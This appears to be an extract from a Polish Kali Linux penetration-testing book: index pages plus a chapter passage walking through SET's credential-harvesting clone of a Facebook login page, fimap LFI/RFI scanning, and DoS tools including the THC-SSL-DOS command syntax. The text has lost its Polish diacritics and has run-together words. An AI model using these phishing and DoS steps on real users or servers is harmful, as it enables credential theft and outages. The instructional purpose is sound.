ochrona 170polityka zarz dzania 277przechowywanie 278przechwytywanie 157 169
249si a 277w systemie Linux 173w systemie Windows 171
haszowanie 170z dodatkiem soli
kryptograficznej 170hexinject 228hiper cza spreparowane 196home feed option 163hosty skanowanie 162HTTrack 66 279Hydra 125
uruchomienie 128
IICMP Echo Request 70identyfikacja
adresoacutew URL 227celoacutew za pomoc serweroacutew
DNS 73obszaroacutew krytycznych 27typoacutew haszowanych warto ci
188
iFrame 196Information Gathering 34 46informatyka ledcza 287
zasady 288integralno 30intercept proxy 105interfejs p tli zwrotnej 239Inundator 269in ynieria
spo eczna 148wsteczna 48
ionCube Loader 64IP Forwarding 141IPSIDS 231iptables 142
Jj zyk SQL 218John the Ripper 137 173
domy lna konfiguracjacie ek 176
haszowanie 170amanie hase 174
proces 137amanie pliku hase 139
s owniki 138 177szybko dzia ania 138
Johnny 138amanie hase 174
opcje konfiguracyjneprogramu 175
s owniki 177uruchamianie 175
KKali Linux 15
aktualizacja pakietu SET 150instalowanie 40
pakietoacutew 43konfiguracja 39Live CD 180 290minimalne wymagania
sprz towe 40narz dzia dost pne
w systemie 46Network Install 40proces konfigurowania
partycji dysku 42publiczny adres IP 225s owniki 129
uruchamianiew maszynie wirtualnej 46w trybie Forensics 290z no nika zewn trznego 39
wprowadzenie do systemu 38karty dost pu 194KeepNote 326klienty 91 147
aplikacji internetowych 169191
HTTP 262klonowanie
rodowiska 278witryny internetowej 66 153
158 251 279klucze uruchamiania systemu
171 173komunikaty
ICMP 70o up ywie czasu dania 70
kopiowanie plikoacutew SAMi SYSTEM z hosta 172
LLinux amanie hase 173lista
adresoacutew URL 227potencjalnych hase 185
listener port 142Live HTTP Headers 134Local File Inclusion 254Logical Volume Manager 43LOIC 263
tryby 266luki w zabezpieczeniach
aktualizacja bazy 276aplikacji internetowych 245
254hostoacutew 167przegl darek 232raport ko cowy 315systemoacutew poczty
elektronicznej 123usuwanie 276wstrzykiwanie kodu SQL 221wstrzykiwanie skryptoacutew 223wykorzystywanie 113wyszukiwanie 92
LVM 43
Kup książkę Poleć książkę
Skorowidz
332
adunek 117amanie hase 137 169
bezp atne us ugi sieciowe190
haszowanych 189maska 189narz dzia 174przechowywanych w plikach
systemowych 169si owe 229systemu Linux 173techniki 169za pomoc John the Ripper
174zabezpieczaj cych BIOS
komputera 190cza modyfikacja 196
MMAC 172MagicTree 327Maintaining Access 38 48Maltego 58 74
zadania 76Maltego CaseFile 326man-in-the-middle 139 211
obrona przed atakiem 281przeprowadzanie manualne
212maska 189mechanizmy
HSTS 140klonowania 153obronne 231 271
testowanie 273pasywnego nas uchiwania 208renegocjacji bezpiecznego
po czenia SSL 257usuwania mi kkich b doacutew
404 93mened er LVM 43metadane 83
wyszukiwanie i analiza 83Metasploit 113 154
skanowanie sieci lokalnej 114wersja konsolowa 114
meterpreter 151uruchomienie sesji 156wykorzystanie 156
metodologiacertyfikacji CISSP 193testoacutew penetracyjnych 24
310 323metody
pojedynczegouwierzytelniania 194
szyfrowania 283mirror server 43MitM Proxy 161montowanie dyskoacutew z systemem
Windows 172
Nnag oacutewki X-Frame-Options 287narz dzia
do klonowania witryn 281do amania hase 174do przechwytywania sesji
198do przeprowadzania atakoacutew
DoSDDoS 285ledcze 295
wspomagaj ce tworzenieraportoacutew 325
nas uchiwaniepakietoacutew sieciowych 199ruchu sieciowego 143 228
nazwy DNS 71Nessus 162
HomeFeed 163instalowanie w systemie
Kali Linux 163ProfessionalFeed 163raporty 167 168skanowanie hostoacutew 166uruchomienie 164u ywanie 164
Netcat 124NetFlow 286NGIPS 236Niskoorbitalne Dzia o Jonowe
263Nmap 76
agresywne skanowanie 79graficzny interfejs
u ytkownika 77okno wynikoacutew skanowania 82opcje 79
NoScript 287no niki danych 288
Oobrona przed atakami
Clickjacking 287DoS 285man-in-the-middle 281przechwytywanie ciasteczek
286SSLstrip 284
ocena ryzyka 30formu y 31okna serwisowe 277
ocl 178oclHashcat 177odgadywanie hase 169okna serwisowe 277Ophcrack 183
uruchomienie w Kali Linux184
osobista weryfikacja to samo ci194
oszacowanie bezpiecze stwa 21o wiadczenie o zachowaniu
poufno ci 307otwarta implementacja sterownikoacutew
kart graficznych 178Owasp-Zap 105 245
automatyczne logowanie 110konfigurowanie przegl darki
108mechanizm aktualizacji ca ego
pakietu 110proces uwierzytelniania 109przeprowadzanie atakoacutew 109raporty 111
PPAE 39pakiety
ARP 212czas ycia 259MitM Proxy 161SET 149 249sieciowe 259TCP 259
pami masowa urz dze 289partycje 172
wymiany 291Pasco 299Password Attacks 37 47 174Patator 229
Kup książkę Poleć książkę
Skorowidz
333
pdf-parser 299pentesterzy 15phishing email 159phrasendrescher 190PIV 194pliki
binarne 298CLF 227indexdat 299Robotstxt 53SAM 171 178 180
wydobycie zawarto ci 173SEED 247shadow 173strefowe 71wyszukiwanie i odzyskiwanie
299poczta elektroniczna 123
fa szywe wiadomo ci 159podatno na atak 29
aktualizacja bazy 276aplikacji internetowych 245
254ocena ryzyka 30przegl darki 232raport ko cowy 315skanowanie 30usuwanie 276wyszukiwanie 92XSS 223 226
podnoszenie uprawnie 37podstawowe wymogi
bezpiecze stwa 303podsumowanie ustale 313polecenia
apt-get install 233apt-get update 233arpspoof 142binwalk 298bkhive 173bkhive SYSTEM bootkey 180bkreg 173chntpw -i 183chntpw -l SAM 181cp 139Data 124db_nmap 115dc3dd 293expand 171exploit 119fdisk 172fierce 123fping 70
getsystem 222git 150HELO 124host 114ifconfig 140ifdown 140iptables 141 142john -test 138MAIL FROM 124md5sum 297msfcli 113msfconsole 113msfgui 113netcat 124ping 70protoko u SMTP 124RCPT TO 124route -n 141samdump 173samdump SAM bootkey 180services 114 115sessions -I 1 157set payload 117sfdisk -l 291sha256sum 294show options 117 118show payloads 117sqlmap 222SYSKEY 173traceroute 69use 116
polityka zarz dzania has ami 277po czenia
HTTP 268HTTPS 268
po czeniaTCP 267troacutejetapowe 79VPN 282
poprawki zabezpiecze 275harmonogram instalowania 276proces zarz dzania 276
porty443 1198080 108 245komunikacyjne 118nas uchuj ce 142
poufno 30poziom zabezpiecze
minimalny 274podstawowy 274
PREROUTING 143
Privilege Escalation 37produkty z poacute ki 231professional feed option 163projekty
Emily 59Gruyere 224 246
promiscuous mode 47Protocol Attacks 256protoko y
8021x 283HTTPS 282MACsec 283routingu 285SSL 257SSLTLS 30 281 286TLS 281
ProxyStrike 98robot sieciowy 100
przechwytywanieciasteczek 197 209 286danych logowania
u ytkownikoacutew 211hase 169 249nazw kont i hase 157obrazoacutew przesy anych
w sieci 217pakietoacutew 213
sieciowych 210TCP 259
przechwytywaniepo cze 161
TCP 267ruchu HTTP oraz HTTPS 238ruchu sieciowego 207 267
270sesji 197 208 233
narz dzia 198przegl d projektu 306przegl darki 232
ochrona przed atakami 236zabezpieczenia 249
przekazywanie pakietoacutew IP 142212
przekierowaniepo cze 284portoacutew komunikacyjnych
142ruchu sieciowego 141sesji 284
przestrze celoacutew 27przetwarzanie wielow tkowe 262PwDump 173
Kup książkę Poleć książkę
Skorowidz
334
RRainbow Tables 47 170RainbowCrack 170 189ramy czasowe 308raport ko cowy
b dy 302dodatki 319dokumentacja 306format 307glosariusz 319informacje o metodologii 310konsekwencje 302narz dzia wspomagaj ce
tworzenie 325o wiadczenie o zachowaniu
poufno ci 307podatno ci i luki
w zabezpieczeniach 315podsumowanie ustale 313
zestawienie elementoacutew 315prezentacja 302przegl d projektu 306ramy czasowe projektu 308specyfikacja 28streszczenie 309strona tytu owa 307szczegoacute owe procedury
testowania 312tworzenie 301us ugi profesjonalne 304wersja ko cowa 306wersja robocza 306wnioski i rekomendacje
dla rodowiska sieciowego316
wymagania 303wype nianie szablonu 306zakres projektu 306zarz dzanie wersjami
dokumentacji 308zgodno ze standardami
i procedurami 303rcracki_mt 189Regional Internet Registries 57rekomendacje 316
powykonawcze 28rekonesans 34 51
badanie zasoboacutew siecikomputerowych 65
Google hacking 61
Google Hacking Database 63lokalizacja 60oferty pracy 59plik Robotstxt 53regionalni administratorzy
adresoacutew IP 57rozpoznanie wst pne 53sieciowy 65strona internetowa firmy 53system EDGAR 57wyszukiwarka Shodan 60z wykorzystaniem protoko u
ICMP 69z wykorzystaniem serweroacutew
DNS 71zadania 52zasoby serwisoacutew
spo eczno ciowych 58zaufanie 59roacuted a przechowuj cehistoryczne wersje witryninternetowych 54
rekordy zasobowe 71Remote File Inclusion 254renegocjacja sesji SSL 258Reporting Tools 48Reverse Engineering 48rich-text 326robot sieciowy 93 100 241roczna oczekiwana strata 31roczny wska nik wyst pienia
zdarzenia 31rootkit 295rozsy anie spreparowanych
pakietoacutew ARP 141rozszerzenia PAE 39ruch sieciowy 206
adresy URL 227man-in-the-middle 212monitorowanie 227nas uchiwanie 143 228przechwytywanie 267 270przekierowanie 213sprawdzanie ilo ci 263urz dzenia monitoruj ce 285
SSAM 171samdump2 178Scalpel 299
Scapy 257 259scenariusze atakoacutew 260
security assessment 21security audit 21serwery 91
aplikacji internetowych 92223zabezpieczanie 136 249
atakowanie 262limit roacutewnoleg ych sesji 262poczty elektronicznej 123proxy 98 105 236
wykorzystanie 238Samba 116sieciowe 91WWW 262
serwery DNSidentyfikacja celoacutew 73proxy 267rekonesans 71
serwisy spo eczno ciowe 58sesja 195
ciasteczka 197logowania 205mechanizmy bezpiecze stwa
195Session Exhaustion 257session fixation attack 195session hijacking 197SET 149 249
adres IP sklonowanej witryny158
aplet Java 156Credential Harvester Attacks
157Exploit to deliver 154importowanie w asnych
plikoacutew witrynyinternetowej 158
IP addresshostname forreverse connection 154
mechanizmy chroni ceprzeprowadzany atak 155
NATPort forwarding 154przechwycenie nazw kont
i hase 157raport o zdarzeniu 160raporty 253rozsy anie fa szywych
wiadomo ci 159URL you want to clone 154
Kup książkę Poleć książkę
Skorowidz
335
uruchomienie 151utworzenie kopii witryny 153zastosowanie do ataku
z klonowaniem 151SharePoint 151Shodan 60Sidejacking 208Siege 268skanery
biometryczne 194stron internetowych 246
skanowanieadresoacutew URL 93agresywne 79celoacutew 35hostoacutew 162podatno ci na ataki 30 32portoacutew 93witryny 255z wykorzystaniem protoko u
ICMP 70Skipfish 95
raport 97s owniki 96
skryptyopakowuj ce 228wykrywanie
nieautoryzowanychskryptoacutew 287
XSS 224 226SLE 31Slowloris 261s owa kluczowe
dbs 222FUZZ 133 135tables 222
sniffer 267Sniffing and Spoofing 48SniffJoke 267Social Engineer Toolkit 149social engineering 16 148SOW 319spodziewana jednorazowa strata
31sqlmap 221SSL stripping 140SSLstrip 140 197 211
konfigurowanieprzekierowania portoacutew 142
mechanizm dzia ania 284obrona przed atakiem 284rozpocz cie ataku 141
SSO 194
standardy 28 304status testu 24 27STIG 274strategia ataku 36Stress Testing 48strony WWW 241suma kontrolna 293
baza 298sygnatury plikoacutew 299SYSKEY 171System services 48systemy
BeEF 59EDGAR 57IDS 93 269IPS 269NGIPS 236roacutewnowa enia obci enia
i filtrowania zawarto ci 286SCADA 60SIEM 270z kartami dost pu 194zabezpiecze 231
szablony witryn 251szare pude ko 24szyfrowane po czenia
https 197VPN 282
Ttablice t czowe 170 189
amanie hase systemuWindows 183
Tamper Data 125TCPReplay 270Tenable 163testowanie
dzia ania roacute nych urz dzesieciowych 270
mechanizmoacutew obronnych 273odporno ci na przeci enia
268podatno ci na ataki XSS 224sklonowanego rodowiska
279testy
o nieograniczonym zakresiedzia ania 26
odporno ci na przeci eniesystemu 256
warunkoacutew skrajnych 256
testy penetracyjne 21a skanowanie podatno ci 32aplikacji internetowych 23bezpiecze stwo zasoboacutew 32cele 22 255etapy 24 34okre lenie poziomu
zabezpiecze 307pomy lno 33przeprowadzanie 32 33socjotechniczne 149w asnego rodowiska 272 273z wykorzystaniem systemu
Kali Linux 34zakres prac 25 26zewn trzne 321zgoda w a ciciela 33
THX-SSL-DOS 257tokeny 194
sesji 197transfery stref 71 73triada CIA 30tryb nas uchiwania 207 215ttl 259
Uumowy
oczekiwania klienta 317potencjalne problemy
i zagadnienia 324rozliczane wed ug zu ycia
czasu i zasoboacutew 305wykaz prac 319ze sta cen 304
unattended installation 39Unicast RPF 285urlsnarf 227usermap_script 116us ugi
NAT 251profesjonalne 304w chmurze 211
usuwanie ladoacutew w amania 38utrzymanie zdobytego
przyczoacute ka 37uwierzytelnianie 193
ataki s ownikowe 228dodatkowe rozwi zania 194dwusk adnikowe 283pojedyncze 194u ytkownikoacutew 193wielosk adnikowe 193
Kup książkę Poleć książkę
Skorowidz
336
VVega 101
modu serwera proxy 104zestawienie znalezionych
podatno ci 104Volume Based Attacks 256Vulnerability Analysis 35 46vulnerability assessment 32
Ww3af 120
wykorzystanie znalezionychpodatno ci i lukw zabezpieczeniach 122
w3mir 281warto
ryzyka 32sumy kontrolnej 293zasobu 31
WayBack Machine 54Web Applications 47Web Developer 199WebCopier 281Webshag 92
obs uga programu 93raport 95
WebSlayer 131atak na dania HTTP 134generator adunkoacutew 132
Websploit 112weryfikacja po cze HTTPS 281white-box 25 30Windows 171
ataki typu offline 171lista kont u ytkownikoacutew 181montowanie dyskoacutew 172odczytywanie i zapisywanie
plikoacutew 172partycja systemu 172uzyskanie dost pu do
systemu 180Windows Reverse_TCP
Meterpreter 154Wireless Attacks 47Wireshark 206
filtrowanie 208wirtualne rodowisko testowe 279wska nik ekspozycji 31wstrzykiwanie
ciasteczek 198kodu 248
kodu SQL 218pakietoacutew 228skryptoacutew 223
wtyczki przegl darki Firefox 198wykaz prac
dodatkowe elementy 323dodatkowe uzgodnienia
prawne 323koszty us ug 323lista narz dzi 324metodologia testoacutew 323oczekiwania
i odpowiedzialno 323szczegoacute owy 319uwierzytelnianie 324zewn trzne testy
penetracyjne 321wykorzystywanie
b doacutew w zabezpieczeniachprzegl darki 196
exploitoacutew 92luk w zabezpieczeniach 113
254systemoacutew poczty
elektronicznej 123zidentyfikowanych
podatno ci 36 254wymogi bezpiecze stwa 273wyszukiwanie
luk w zabezpieczeniach 92 221metadanych 83podatno ci 29 35 92
wytyczne 28 304
XXSS 223
aplikacje internetowe 248testowanie podatno ci 224
XSS cookie stealing 225
Zzabezpieczanie
serweroacutew aplikacjiinternetowych 249
systemoacutew pod czonychdo internetu 271
zakres prac 319cel testu 33definicja
przestrzeni celoacutew 27systemoacutew 26
zdobycia flagi 28dokument 25identyfikacja obszaroacutew
krytycznych 27materia y i raporty 33metody testowania 26narz dzia 27oprogramowanie 27osoby powiadomione o
planowanym te cie 27pocz tkowy status testu 27ramy czasowe testu 26 308reakcja na proacuteby
prze amywaniazabezpiecze 27
rekomendacjepowykonawcze 28
specyfikacja raportuko cowego 28
ZAP 236 245obrona przed zdalnymi
atakami 249Zaproxy 105zarz dzanie
aktualizacjami 275poprawkami zabezpiecze
275serwerem pakietu 233sesjami 195wersjami dokumentoacutew 308
zasoby sieciowe odpornona przeci enie 263
zatarcie ladoacutew penetracji systemu38
zaufanie 59 148zbieranie odciskoacutew systemu 51zdobycie flagi 28Zenmap 77 82 125
Host details 81Zero-day 275zewn trzny dysk USB 292zmienne
LHOST 118RHOST 117
znaczniki czasu 172zrzut okna 327
daniaForm 131mapowanie 24
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
250
Przed pierwszym uruchomieniem pakietu upewnij si e dokona e jego aktualizacji do najnow-szej wersji Szczegoacute ow instrukcj jak krok po kroku przeprowadzi aktualizacj pakietu SETznajdziesz w rozdziale 4
Kiedy pakiet SET zako czy klonowanie wybranej witryny internetowej mo e j uruchomi na w asnymserwerze WWW Bardzo wa nym elementem ataku jest przekonanie u ytkownika b d cego celem abypo czy si z kopi witryny dzia aj c na Twoim w asnym serwerze Oznacza to e do atakoacutew na celew internecie b dziesz musia u y maszyny posiadaj cej publiczny adres IP Oproacutecz tego b dziesz musiautworzy odpowiednie regu y dla zapory sieciowej tak aby zdalni u ytkownicy mogli si po czy z ze-wn trz z Twoim serwerem
Po zako czeniu konfiguracji ustawie adresoacutew IP i regu zapory sieciowej nadszed czas nauruchomienie pakietu SET
Tym razem pakietu SET b dziemy u ywa do przechwytywania i zbierania hase dost pu Jakpami tasz SET posiada mechanizmy pozwalaj ce na sklonowanie praktycznie dowolnie wybranejwitryny internetowej W naszym przyk adzie wykorzystamy pakiet SET do sklonowania witrynyjednego z najpopularniejszych serwisoacutew spo eczno ciowych Po uruchomieniu pakietu musisz za-akceptowa wszystkie warunki umowy licencyjnej tak jak zaprezentowano na rysunku na na-st pnej stronie
Po uruchomieniu pakietu SET warto od czasu do czasu wybra z menu g oacutewnego opcj 5) Update theSocial-Engineer Toolkit ktoacutera sprawdzi czy korzystasz z najnowszej wersji pakietu Je eli oka e si enie zostan zainstalowane odpowiednie aktualizacje Je eli po wybraniu tej opcji wy wietli si komuni-kat o b dzie informuj cy e repozytoria GIT nie istniej to prawdopodobnie pakiet GIT nie jest zainstalowa-ny lub zosta zainstalowany niepoprawnie (zawsze istnieje roacutewnie ryzyko e co si zmieni o w ca ejprocedurze od czasu kiedy powstawa a ta ksi ka) Wi cej szczegoacute owych informacji i wskazoacutewek na tematu ytkowania pakietu SET w systemie Kali Linux znajdziesz na blogach autoroacutew ksi ki Amira Lakhaniego(zobacz stron httpwwwDrChaoscom) lub Josepha Muniza (zobacz stron httpwwwthesecurity
bloggercom)
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
251
1 Gdy zako czy si aktualizacja pakietu SET do najnowszej wersji z menu g oacutewnegowybierz opcj 1) Social-Engineering Attacks
2 Teraz wybierz opcj 2) Website Attack Vectors 3 Wybierz opcj 3) Credential Harvester Attack Method
Do wyboru masz teraz kilka opcji okre laj cych sposoacuteb klonowania wybranej witryny PakietSET posiada swoje w asne wbudowane szablony dla popularnych witryn takich jak Facebookczy Gmail Czasami u ycie szablonu nie jest najlepszym rozwi zaniem aczkolwiek na pocz tekpowinno w zupe no ci wystarczy Je eli zamiast szablonu chcesz u y kopii wybranej witry-ny internetowej musisz poda jej adres URL mdash pakiet SET rozpocznie proces klonowania
Je eli posiadasz ju wykonan wcze niej kopi witryny lub samodzielnie utworzy e odpowiedniepliki HTML mo esz wybra opcj 3) Custom Import Po wybraniu tej opcji b dziesz moacutegwskaza lokalizacj plikoacutew HTML ktoacuterych chcesz u y
W naszym przyk adzie u yjemy gotowych szablonoacutew witryn internetowych Pakiet SET poprosio podanie adresu IP na ktoacuterym b dzie nas uchiwa nadchodz cych da mdash w tym przypadkub dzie to adres IP interfejsu sieciowego naszego systemu Kali Linux Wyj tkiem od tej regu ymo e by sytuacja kiedy wykorzystujesz us ug NAT zapory sieciowej W takim przypadkuzamiast lokalnego adresu IP systemu Kali Linux powiniene u y publicznego adresu IP hostaus ugi NAT tak aby klienty z zewn trz mog y czy si z Twoim systemem W naszym przy-k adzie u yjemy adresu IP interfejsu p tli zwrotnej 127001
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
252
Kiedy zdefiniujesz adres IP pakiet SET poprosi Ci o wybranie szablonu W naszym przy-padku wybierzemy opcj Facebook
Na kolejnym rysunku przedstawiono okno przegl darki po czonej z serwerem o adresie127001 i wy wietlaj cej nasz fa szyw stron portalu Facebook Je eli wy wietlona stronanie wygl da przekonuj co mo esz u y innego szablonu albo po prostu sklonowa aktualnwersj danej strony
Zwroacute uwag e w pasku adresu przegl darki wy wietlany jest adres 127001 W wi kszo ciprzypadkoacutew b dziesz musia jednak u y nieco bardziej wyrafinowanych wektoroacutew atakuaby przekona u ytkownikoacutew do odwiedzenia Twojej spreparowanej strony internetowejMo esz to zrobi na wiele sposoboacutew na przyk ad poprzez rozsy anie do u ytkownikoacutew pocztelektroniczn specjalnie przygotowanej wiadomo ci zawieraj cej cze do Twojej spreparowanejwitryny internetowej (zobacz pierwszy rysunek na nast pnej stronie)
Kiedy u ytkownik rozpocznie wpisywanie nazwy konta i has a dost pu na naszej fa szywejstronie udaj cej witryn Facebook pakiet SET przechwyci ca y zwi zany z tym ruch sieciowyi nast pnie przekieruje u ytkownika do prawdziwej witryny internetowej Istnieje bardzo du-a szansa na to e po takim przekierowaniu u ytkownik b dzie przekonany e po prostu po-
myli si podczas wpisywania has a i zaloguje si jeszcze raz nie maj c wiadomo ci e bdquopodrodzerdquo pakiet SET przechwyci nazw jego konta i has o dost pu (zobacz drugi rysunek nanast pnej stronie)
Jak wida na powy szym rysunku pakiet SET przechwyci nazw naszego konta u ytkownikaDrChaos i nasze has o dost pu ILoveKali
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
253
Po zako czeniu tego wiczenia u yj kombinacji klawiszy Ctrl+C aby zako czy prac programuSET i wygenerowa raport w formacie HTML SET generuje profesjonalnie wygl daj cy ra-port ktoacuterego mo esz z powodzeniem u y podczas tworzenia raportu ko cowego z przepro-wadzonego testu penetracyjnego
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
254
Fimap
Fimap to narz dzie napisane w j zyku Python przeznaczone do wyszukiwania i wykorzysty-wania podatno ci i luk w zabezpieczeniach aplikacji internetowych pozwalaj cych na przeprowa-dzanie atakoacutew typu LFI (ang Local File Inclusion) lub RFI (ang Remote File Inclusion)
Aby uruchomi pakiet Fimap w systemie Kali Linux przejd do grupy Kali Linux a nast pniewybierz polecenie Web ApplicationsWeb Vulnerability Scannersfimap Po wybraniu tegopolecenia na ekranie pojawi si nowe okno terminala z wy wietlonym ekranem powitalnympolecenia fimap Dla pakietu fimap istnieje roacutewnie kilka dodatkowych wtyczek ktoacutere mo eszpobra z internetu i zainstalowa za pomoc nast puj cego polecenia
fimap --install -plugins
Dost pne wtyczki zostan wy wietlone w formie listy z opcj pozwalaj c na zainstalowaniewybranej wtyczki lub zako czenie dzia ania polecenia Jak wida w naszym przyk adzie do-st pne s dwie dodatkowe wtyczki st d polecenie instalowania musimy wykona dwukrotnieindywidualnie instaluj c poszczegoacutelne wtyczki (zobacz pierwszy rysunek na nast pnej stronie)
Aby u y pakietu Fimap musisz najpierw poda adres URL witryny ktoacutera b dzie celem skaneraIstnieje wiele metod definiowania adresoacutew URL Mo esz na przyk ad poda jeden wybrany adresURL ca list adresoacutew URL mo esz u y wyszukiwarki Google do zebrania adresoacutew URL
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
255
ale roacutewnie dobrze mo esz u y innych metod takich jak zbieranie wszystkich adresoacutew URLz hiper czy zamieszczonych na danej stronie internetowej czy pozyskiwanie adresoacutew URL z for-mularzy i nag oacutewkoacutew stron W naszym przypadku celem skanera b dzie witryna httpwwwthesecuritybloggercom
Aby uruchomi skanowanie witryny httpwwwthesecuritybloggercom powiniene wpisanast puj ce polecenie
fimap -u httpwwwthesecuritybloggercom
Pakiet Fimap rozpocznie skanowanie i sproacutebuje automatycznie wykry podatno ci na atakitypu LFIRFI Na rysunku przedstawionym poni ej wida jednak e witryna wwwthesecurity
bloggercom jest odporna na tego typu ataki
Ataki typu DoSW zdecydowanej wi kszo ci przypadkoacutew celem przeprowadzania testoacutew penetracyjnych jestidentyfikacja potencjalnych i rzeczywistych podatno ci i luk w zabezpieczeniach bez umy l-nego zak oacutecania dzia ania atakowanego systemu i bez robienia mu krzywdy w jakikolwiek in-ny sposoacuteb Jest to kluczowy element odroacute niaj cy autoryzowanego pentestera od z o liwegonapastnika maj cego niecne zamiary Prawdziwy napastnik nie przestrzega adnych regu
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
256
i nie zwraca uwagi na to czy jego dzia ania spowoduj zak oacutecenia w funkcjonowaniu atako-wanego systemu je eli tylko takie post powanie b dzie dla niego korzystne Czasami zdarzasi nawet e napastnik b dzie wr cz za wszelk cen szuka mo liwo ci zak oacutecenia dzia aniaczy nawet ca kowitego wy czenia atakowanego systemu Z tego powodu w niektoacuterych przypad-kach przeprowadzenie testoacutew odporno ci danej witryny czy aplikacji internetowej na ataki typuDoS (ang Denial of Service) mo e by bardzo po dane Testy tego rodzaju cz sto s nazywanetestami warunkoacutew skrajnych lub testami odporno ci na przeci enie systemu (ang stress testing)
Jedn z najwa niejszych spraw zwi zanych z testami odporno ci na ataki typu DoS jest bezwzgl dne uzyska-nie pisemnej zgody w a ciciela systemu na przeprowadzanie takich atakoacutew Niektoacutere metody atakoacutewmog mie negatywny wp yw na funkcjonowanie systemu nawet po zako czeniu testoacutew Dobrym roz-wi zaniem jest przeprowadzanie takich testoacutew na systemach z redundancj systemach nieprodukcyj-nych czy systemach zainstalowanych w rodowisku laboratoryjnym o ile to oczywi cie mo liwe
Najcz ciej spotykana metoda ataku DoS polega na bdquozalewaniurdquo badanego systemu masowonap ywaj cymi z zewn trz daniami Takie przeci enie zazwyczaj skutecznie uniemo liwiasystemowi odpowiadanie na rzeczywiste dania od autoryzowanych klientoacutew lub co najmniejtak spowalnia wysy anie odpowiedzi e ca y system staje si dla klientoacutew praktycznie bezu-yteczny Ataki typu DoS mog by skierowane na zasoby systemu (np przypisana przestrze
dyskowa przepustowo po cze sieciowych itd) konfiguracj systemu (np usuwanie tablicroutingu) informacje o stanie systemu (np resetowanie sesji TCP) oraz ka dy inny elementrodowiska systemu ktoacuterego przeci enie mo e spowodowa zak oacutecenie jego normalnego
funkcjonowania
Roacute nica pomi dzy atakami DoS (ang Denial of Service) a DDoS (ang Distributed Denial of Service) polega natym e do przeprowadzania ataku DoS napastnik wykorzystuje tylko jeden komputer podczas gdy w przy-padku atakoacutew DDoS liczba maszyn bior cych udzia w ataku mo e si ga tysi cy Omawianie zagadniezwi zanych z atakami DDoS wykracza niestety daleko poza ramy naszej ksi ki
Istniej cztery g oacutewne kategorie atakoacutew DoSDDoS Ataki wykorzystuj ce przeci enie po cze sieciowych (ang Volume Based
Attacks) mdash taki rodzaj ataku jest zwi zany z bdquozalewaniemrdquo atakowanego systemumasowo nap ywaj cymi pakietami UDP ICMP i innymi Celem takiego ataku jestprzeci enie po cze sieciowych atakowanego systemu nadmiernymi ilo ciamiprzesy anych pakietoacutew
Ataki na protoko y komunikacyjne (ang Protocol Attacks) mdash ataki te maj na celunadmierne wykorzystywanie zasoboacutew urz dze sieciowych takich jak routeryzapory sieciowe urz dzenia roacutewnowa ce obci enie po cze sieciowychPrzyk adami atakoacutew na protoko y komunikacyjne s ataki typu SYN floodPing of Death Smurf Teardrop wymuszanie fragmentacji pakietoacutew itp
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
257
Ataki na warstw aplikacji (ang Application Layer Attacks) mdash takie ataki wykorzystujnormalny ruch sieciowy do zak oacutecenia dzia ania lub nawet spowodowania awariidanej witryny lub aplikacji internetowej Przyk adami mog by ataki typu Zero-Dayczy ataki wykorzystuj ce inne podatno ci i luki w zabezpieczeniach witryn i aplikacjiinternetowych
Ataki powoduj ce wyczerpanie zasoboacutew sesji (ang Session Exhaustion) mdash takieataki powoduj wyczerpanie liczby dozwolonych jednocze nie sesji poprzez ci g enawi zywanie nowych po cze bez zamykania starych sesji co prowadzido wyczerpania zasoboacutew systemu
W systemie Kali Linux znajdziesz wiele narz dzi pozwalaj cych na wykorzystywanie podat-no ci i luk w zabezpieczeniach Narz dzia te na przyk ad Metasploit mog by u ywane doprzeprowadzania atakoacutew DoS na warstw aplikacji (wiele z tych narz dzi omawiali my ju wewcze niejszych rozdzia ach) W rozdziale 3 prezentowali my popularne narz dzie Scapypozwalaj ce na przeprowadzanie atakoacutew DoS na protoko y komunikacyjne Poni ej znaj-dziesz omoacutewienie kilku kolejnych narz dzi s u cych do przeprowadzania atakoacutew DoS ktoacuteremo esz znale w systemie Kali Linux
Aby przetestowa skuteczno ataku DoS mo esz u y witryny httpwwwupordownorg ktoacutera sprawdzadost pno podanej witryny internetowej
THX-SSL-DOSProtokoacute SSL (ang Secure Socket Layer) jest u ywany do nawi zywania bezpiecznych po -cze i transakcji w internecie Nawi zanie bezpiecznego po czenia z wykorzystaniem proto-ko u SSL wymaga u ycia po stronie serwera 15 razy wi kszej mocy obliczeniowej ni po stro-nie klienta Atak typu THC-SSL-DOS wykorzystuje t dysproporcj przez proacuteb prze adowaniaserwera spreparowanymi daniami nawi zania sesji SSL a do momentu kiedy przeci onyserwer si poddaje i przestaje odpowiada na dania przesy ane od innych autoryzowanychklientoacutew Atak wykorzystuje mechanizm renegocjacji bezpiecznego po czenia SSL do gene-rowania tysi cy takich da dla pojedynczego po czenia TCP Z tego powodu atak ten jestroacutewnie znany jako atak typu SSL-Exhaustion (ang mdash bdquowyczerpanie zasoboacutew SSLrdquo) Zalettakiego podej cia jest to e mo liwo ci przetwarzania da nawi zania sesji SSL s znaczniewy sze po stronie klienta co oznacza e przeci tny laptop pod czony do sieci za po red-nictwem cza o przeci tnej szybko ci mo e rzuci powa ne wyzwanie niemal ka demu serwero-wi aplikacji internetowych Podatno serweroacutew internetowych na ataki typu SSL-Exhaustionjest powszechnie znana a mimo to nie uda o si jeszcze opracowa skutecznej metody zapo-biegania takim atakom
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
258
Aby uruchomi pakiet THC-SSL-DOS w menu g oacutewnym systemu przejd do grupy Kali Linuxa nast pnie wybierz polecenie Stress TestingWeb Stress Testingthc-ssl-dos Po wybraniu pole-cenia pojawi si nowe okno terminala z ekranem powitalnym polecenia thc-ssl-dos Sk adniapolecenia jest nast puj ca
thc-ssl-dos [opcje] ltadres IP ofiarygt ltportgt and --accept
W wierszu wywo ania polecenia musisz umie ci opcj --accept w przeciwnym wypadku otrzymaszkomunikat o b dzie przedstawiony poni ej
